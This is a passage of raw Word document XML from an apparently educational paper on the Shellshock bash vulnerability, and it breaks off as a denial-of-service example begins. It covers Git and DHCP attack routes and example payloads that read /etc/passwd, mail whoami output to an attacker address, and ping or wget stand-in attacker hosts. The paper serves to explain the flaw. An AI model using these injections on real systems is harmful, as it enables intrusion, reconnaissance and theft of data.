      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh git@gitserver </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>() { :;}; echo vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>DHCP server side program provides options for the administrator of the server to append custo</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ized variables in the settings as parameters for the client system. The attacker could set up a malicious DHCP server and wait for the requests from victim machines. Any clients attempt to connect with such a DHCP server will execute the crafted code thus be attacked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Examples of exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>As principles and routes provided above, what kinds of attacks can be carried out is only limited to the attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s imagination. Here we discuss several types of popular attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Firstly, Shellshock can be utilized to retrieve confidential information from the victim server. For example, injection of the following command will reveal password file, which is highly sensitive, to the a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tacker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00434EBB" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;}; /bin/cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In another attack, the attacker can find out who is running the server and other important information by email:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00434EBB" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;}; /bin/bash -c “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | mail -s ‘</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>attacker@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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could be substituted into any other commands and </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>attacker@gmail.com</w:t>
        </w:r>
      </w:hyperlink>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is the email address for the attacker to receive such information. Files in the system could be sent out in the same way. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Secondly, Shellshock is also useful for reconnaissance. It is often that attackers utilize other m</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chines rather than theirs, such as bots they control, to perform reconnaissance and attacks to avoid tra</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ing back. On this sense, a server with Shellshock vulnerability could be very useful and easy to manip</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">late. The purpose of reconnaissance is to find out which machines are vulnerable. A popular technique to achieve this mission is simply to make the target machines send </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping</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back. </w:t>
      </w:r>
      <w:r w:rsidR="002C3E2E" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Here</w:t>
      </w:r>
      <w:r w:rsidR="002C3E2E" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="002C3E2E" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00434EBB" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">;}; ping -c 1 -p cb18cb3f7bca4441a595fcc1e240deb0 </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>attacker-machine.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In this command, the attacker injected a ping command, which will ping once with a unique payload id to </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>attacker-machine.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Listening mechanisms are deployed on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>attacker-machine.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to collect info</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mation and determine which targets are alive and vulnerable. Another technique often used to identify vulnerable servers is to make the web server download a fabricated</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> web page </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with special name from an attacker-controlled machine. The attacker can then check the logs of his own web server to find out which machine is</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> One example Shellshock string: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00ED0D12" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;}; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://attacker-controlled.com/ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA== &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thirdly, Shellshock could directly be utilized to perform Denial of Service attack. A simple Shel</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shock string goes like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
